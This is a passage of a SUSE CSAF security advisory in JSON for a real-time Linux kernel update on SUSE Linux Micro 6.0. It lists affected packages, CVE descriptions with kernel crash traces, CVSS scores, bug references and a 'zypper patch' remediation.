"summary": "SUSE CVE CVE-2026-23221 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23221/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23222 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23222/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23229 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23229/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-03-24T16:48:38Z",
"generator": {
"date": "2026-03-24T16:48:38Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20845-1",
"initial_release_date": "2026-03-24T16:48:38Z",
"revision_history": [
{
"date": "2026-03-24T16:48:38Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-rt-6.4.0-40.1.noarch",
"product": {
"name": "kernel-devel-rt-6.4.0-40.1.noarch",
"product_id": "kernel-devel-rt-6.4.0-40.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-rt-6.4.0-40.1.noarch",
"product": {
"name": "kernel-source-rt-6.4.0-40.1.noarch",
"product_id": "kernel-source-rt-6.4.0-40.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-6.4.0-40.1.x86_64",
"product": {
"name": "kernel-rt-6.4.0-40.1.x86_64",
"product_id": "kernel-rt-6.4.0-40.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-6.4.0-40.1.x86_64",
"product": {
"name": "kernel-rt-livepatch-6.4.0-40.1.x86_64",
"product_id": "kernel-rt-livepatch-6.4.0-40.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.0"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-rt-6.4.0-40.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch"
},
"product_reference": "kernel-devel-rt-6.4.0-40.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-6.4.0-40.1.x86_64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64"
},
"product_reference": "kernel-rt-6.4.0-40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-livepatch-6.4.0-40.1.x86_64 as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64"
},
"product_reference": "kernel-rt-livepatch-6.4.0-40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-rt-6.4.0-40.1.noarch as component of SUSE Linux Micro 6.0",
"product_id": "SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
},
"product_reference": "kernel-source-rt-6.4.0-40.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-42752",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-42752"
}
],
"notes": [
{
"category": "general",
"text": "An integer overflow flaw was found in the Linux kernel. This issue leads to the kernel allocating `skb_shared_info` in the userspace, which is exploitable in systems without SMAP protection since `skb_shared_info` contains references to function pointers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-42752",
"url": "https://www.suse.com/security/cve/CVE-2023-42752"
},
{
"category": "external",
"summary": "SUSE Bug 1215146 for CVE-2023-42752",
"url": "https://bugzilla.suse.com/1215146"
},
{
"category": "external",
"summary": "SUSE Bug 1215468 for CVE-2023-42752",
"url": "https://bugzilla.suse.com/1215468"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-42752"
},
{
"cve": "CVE-2023-53714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53714"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/stm: ltdc: fix late dereference check\n\nIn ltdc_crtc_set_crc_source(), struct drm_crtc was dereferenced in a\ncontainer_of() before the pointer check. This could cause a kernel panic.\n\nFix this smatch warning:\ndrivers/gpu/drm/stm/ltdc.c:1124 ltdc_crtc_set_crc_source() warn: variable dereferenced before check \u0027crtc\u0027 (see line 1119)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53714",
"url": "https://www.suse.com/security/cve/CVE-2023-53714"
},
{
"category": "external",
"summary": "SUSE Bug 1254465 for CVE-2023-53714",
"url": "https://bugzilla.suse.com/1254465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53714"
},
{
"cve": "CVE-2023-53743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: Free released resource after coalescing\n\nrelease_resource() doesn\u0027t actually free the resource or resource list\nentry so free the resource list entry to avoid a leak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53743",
"url": "https://www.suse.com/security/cve/CVE-2023-53743"
},
{
"category": "external",
"summary": "SUSE Bug 1254782 for CVE-2023-53743",
"url": "https://bugzilla.suse.com/1254782"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53743"
},
{
"cve": "CVE-2023-53750",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53750"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: freescale: Fix a memory out of bounds when num_configs is 1\n\nThe config passed in by pad wakeup is 1, when num_configs is 1,\nConfiguration [1] should not be fetched, which will be detected\nby KASAN as a memory out of bounds condition. Modify to get\nconfigs[1] when num_configs is 2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53750",
"url": "https://www.suse.com/security/cve/CVE-2023-53750"
},
{
"category": "external",
"summary": "SUSE Bug 1254611 for CVE-2023-53750",
"url": "https://bugzilla.suse.com/1254611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53750"
},
{
"cve": "CVE-2023-53752",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53752"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: deal with integer overflows in kmalloc_reserve()\n\nBlamed commit changed:\n ptr = kmalloc(size);\n if (ptr)\n size = ksize(ptr);\n\n size = kmalloc_size_roundup(size);\n ptr = kmalloc(size);\n\nThis allowed various crash as reported by syzbot [1]\nand Kyle Zeng.\n\nProblem is that if @size is bigger than 0x80000001,\nkmalloc_size_roundup(size) returns 2^32.\n\nkmalloc_reserve() uses a 32bit variable (obj_size),\nso 2^32 is truncated to 0.\n\nkmalloc(0) returns ZERO_SIZE_PTR which is not handled by\nskb allocations.\n\nFollowing trace can be triggered if a netdev-\u003emtu is set\nclose to 0x7fffffff\n\nWe might in the future limit netdev-\u003emtu to more sensible\nlimit (like KMALLOC_MAX_SIZE).\n\nThis patch is based on a syzbot report, and also a report\nand tentative fix from Kyle Zeng.\n\n[1]\nBUG: KASAN: user-memory-access in __build_skb_around net/core/skbuff.c:294 [inline]\nBUG: KASAN: user-memory-access in __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527\nWrite of size 32 at addr 00000000fffffd10 by task syz-executor.4/22554\n\nCPU: 1 PID: 22554 Comm: syz-executor.4 Not tainted 6.1.39-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023\nCall trace:\ndump_backtrace+0x1c8/0x1f4 arch/arm64/kernel/stacktrace.c:279\nshow_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:286\n__dump_stack lib/dump_stack.c:88 [inline]\ndump_stack_lvl+0x120/0x1a0 lib/dump_stack.c:106\nprint_report+0xe4/0x4b4 mm/kasan/report.c:398\nkasan_report+0x150/0x1ac mm/kasan/report.c:495\nkasan_check_range+0x264/0x2a4 mm/kasan/generic.c:189\nmemset+0x40/0x70 mm/kasan/shadow.c:44\n__build_skb_around net/core/skbuff.c:294 [inline]\n__alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527\nalloc_skb include/linux/skbuff.h:1316 [inline]\nigmpv3_newpack+0x104/0x1088 net/ipv4/igmp.c:359\nadd_grec+0x81c/0x1124 net/ipv4/igmp.c:534\nigmpv3_send_cr net/ipv4/igmp.c:667 [inline]\nigmp_ifc_timer_expire+0x1b0/0x1008 net/ipv4/igmp.c:810\ncall_timer_fn+0x1c0/0x9f0 kernel/time/timer.c:1474\nexpire_timers kernel/time/timer.c:1519 [inline]\n__run_timers+0x54c/0x710 kernel/time/timer.c:1790\nrun_timer_softirq+0x28/0x4c kernel/time/timer.c:1803\n_stext+0x380/0xfbc\n____do_softirq+0x14/0x20 arch/arm64/kernel/irq.c:79\ncall_on_irq_stack+0x24/0x4c arch/arm64/kernel/entry.S:891\ndo_softirq_own_stack+0x20/0x2c arch/arm64/kernel/irq.c:84\ninvoke_softirq kernel/softirq.c:437 [inline]\n__irq_exit_rcu+0x1c0/0x4cc kernel/softirq.c:683\nirq_exit_rcu+0x14/0x78 kernel/softirq.c:695\nel0_interrupt+0x7c/0x2e0 arch/arm64/kernel/entry-common.c:717\n__el0_irq_handler_common+0x18/0x24 arch/arm64/kernel/entry-common.c:724\nel0t_64_irq_handler+0x10/0x1c arch/arm64/kernel/entry-common.c:729\nel0t_64_irq+0x1a0/0x1a4 arch/arm64/kernel/entry.S:584",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53752",
"url": "https://www.suse.com/security/cve/CVE-2023-53752"
},
{
"category": "external",
"summary": "SUSE Bug 1254613 for CVE-2023-53752",
"url": "https://bugzilla.suse.com/1254613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53752"
},
{
"cve": "CVE-2023-53759",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53759"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: hidraw: fix data race on device refcount\n\nThe hidraw_open() function increments the hidraw device reference\ncounter. The counter has no dedicated synchronization mechanism,\nresulting in a potential data race when concurrently opening a device.\n\nThe race is a regression introduced by commit 8590222e4b02 (\"HID:\nhidraw: Replace hidraw device table mutex with a rwsem\"). While\nminors_rwsem is intended to protect the hidraw_table itself, by instead\nacquiring the lock for writing, the reference counter is also protected.\nThis is symmetrical to hidraw_release().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53759",
"url": "https://www.suse.com/security/cve/CVE-2023-53759"
},
{
"category": "external",
"summary": "SUSE Bug 1254663 for CVE-2023-53759",
"url": "https://bugzilla.suse.com/1254663"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53759"
},
{
"cve": "CVE-2023-53762",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53762"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Fix UAF in hci_disconnect_all_sync\n\nUse-after-free can occur in hci_disconnect_all_sync if a connection is\ndeleted by concurrent processing of a controller event.\n\nTo prevent this the code now tries to iterate over the list backwards\nto ensure the links are cleanup before its parents, also it no longer\nrelies on a cursor, instead it always uses the last element since\nhci_abort_conn_sync is guaranteed to call hci_conn_del.\n\nUAF crash log:\n==================================================================\nBUG: KASAN: slab-use-after-free in hci_set_powered_sync\n(net/bluetooth/hci_sync.c:5424) [bluetooth]\nRead of size 8 at addr ffff888009d9c000 by task kworker/u9:0/124\n\nCPU: 0 PID: 124 Comm: kworker/u9:0 Tainted: G W\n6.5.0-rc1+ #10\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n1.16.2-1.fc38 04/01/2014\nWorkqueue: hci0 hci_cmd_sync_work [bluetooth]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x5b/0x90\n print_report+0xcf/0x670\n ? __virt_addr_valid+0xdd/0x160\n ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n kasan_report+0xa6/0xe0\n ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n ? __pfx_set_powered_sync+0x10/0x10 [bluetooth]\n hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n ? __pfx_hci_set_powered_sync+0x10/0x10 [bluetooth]\n ? __pfx_lock_release+0x10/0x10\n ? __pfx_set_powered_sync+0x10/0x10 [bluetooth]\n hci_cmd_sync_work+0x137/0x220 [bluetooth]\n process_one_work+0x526/0x9d0\n ? __pfx_process_one_work+0x10/0x10\n ? __pfx_do_raw_spin_lock+0x10/0x10\n ? mark_held_locks+0x1a/0x90\n worker_thread+0x92/0x630\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x196/0x1e0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x2c/0x50\n \u003c/TASK\u003e\n\nAllocated by task 1782:\n kasan_save_stack+0x33/0x60\n kasan_set_track+0x25/0x30\n __kasan_kmalloc+0x8f/0xa0\n hci_conn_add+0xa5/0xa80 [bluetooth]\n hci_bind_cis+0x881/0x9b0 [bluetooth]\n iso_connect_cis+0x121/0x520 [bluetooth]\n iso_sock_connect+0x3f6/0x790 [bluetooth]\n __sys_connect+0x109/0x130\n __x64_sys_connect+0x40/0x50\n do_syscall_64+0x60/0x90\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFreed by task 695:\n kasan_save_stack+0x33/0x60\n kasan_set_track+0x25/0x30\n kasan_save_free_info+0x2b/0x50\n __kasan_slab_free+0x10a/0x180\n __kmem_cache_free+0x14d/0x2e0\n device_release+0x5d/0xf0\n kobject_put+0xdf/0x270\n hci_disconn_complete_evt+0x274/0x3a0 [bluetooth]\n hci_event_packet+0x579/0x7e0 [bluetooth]\n hci_rx_work+0x287/0xaa0 [bluetooth]\n process_one_work+0x526/0x9d0\n worker_thread+0x92/0x630\n kthread+0x196/0x1e0\n ret_from_fork+0x2c/0x50\n==================================================================",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53762",
"url": "https://www.suse.com/security/cve/CVE-2023-53762"
},
{
"category": "external",
"summary": "SUSE Bug 1254606 for CVE-2023-53762",
"url": "https://bugzilla.suse.com/1254606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53762"
},
{
"cve": "CVE-2023-53766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nFS: JFS: Check for read-only mounted filesystem in txBegin\n\n This patch adds a check for read-only mounted filesystem\n in txBegin before starting a transaction potentially saving\n from NULL pointer deref.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53766",
"url": "https://www.suse.com/security/cve/CVE-2023-53766"
},
{
"category": "external",
"summary": "SUSE Bug 1255005 for CVE-2023-53766",
"url": "https://bugzilla.suse.com/1255005"
},
{
"category": "external",
"summary": "SUSE Bug 1255006 for CVE-2023-53766",
"url": "https://bugzilla.suse.com/1255006"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-53766"
},
{
"cve": "CVE-2023-53768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap-irq: Fix out-of-bounds access when allocating config buffers\n\nWhen allocating the 2D array for handling IRQ type registers in\nregmap_add_irq_chip_fwnode(), the intent is to allocate a matrix\nwith num_config_bases rows and num_config_regs columns.\n\nThis is currently handled by allocating a buffer to hold a pointer for\neach row (i.e. num_config_bases). After that, the logic attempts to\nallocate the memory required to hold the register configuration for\neach row. However, instead of doing this allocation for each row\n(i.e. num_config_bases allocations), the logic erroneously does this\nallocation num_config_regs number of times.\n\nThis scenario can lead to out-of-bounds accesses when num_config_regs\nis greater than num_config_bases. Fix this by updating the terminating\ncondition of the loop that allocates the memory for holding the register\nconfiguration to allocate memory only for each row in the matrix.\n\nAmit Pundir reported a crash that was occurring on his db845c device\ndue to memory corruption (see \"Closes\" tag for Amit\u0027s report). The KASAN\nreport below helped narrow it down to this issue:\n\n[ 14.033877][ T1] ==================================================================\n[ 14.042507][ T1] BUG: KASAN: invalid-access in regmap_add_irq_chip_fwnode+0x594/0x1364\n[ 14.050796][ T1] Write of size 8 at addr 06ffff8081021850 by task init/1\n\n[ 14.242004][ T1] The buggy address belongs to the object at ffffff8081021850\n[ 14.242004][ T1] which belongs to the cache kmalloc-8 of size 8\n[ 14.255669][ T1] The buggy address is located 0 bytes inside of\n[ 14.255669][ T1] 8-byte region [ffffff8081021850, ffffff8081021858)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
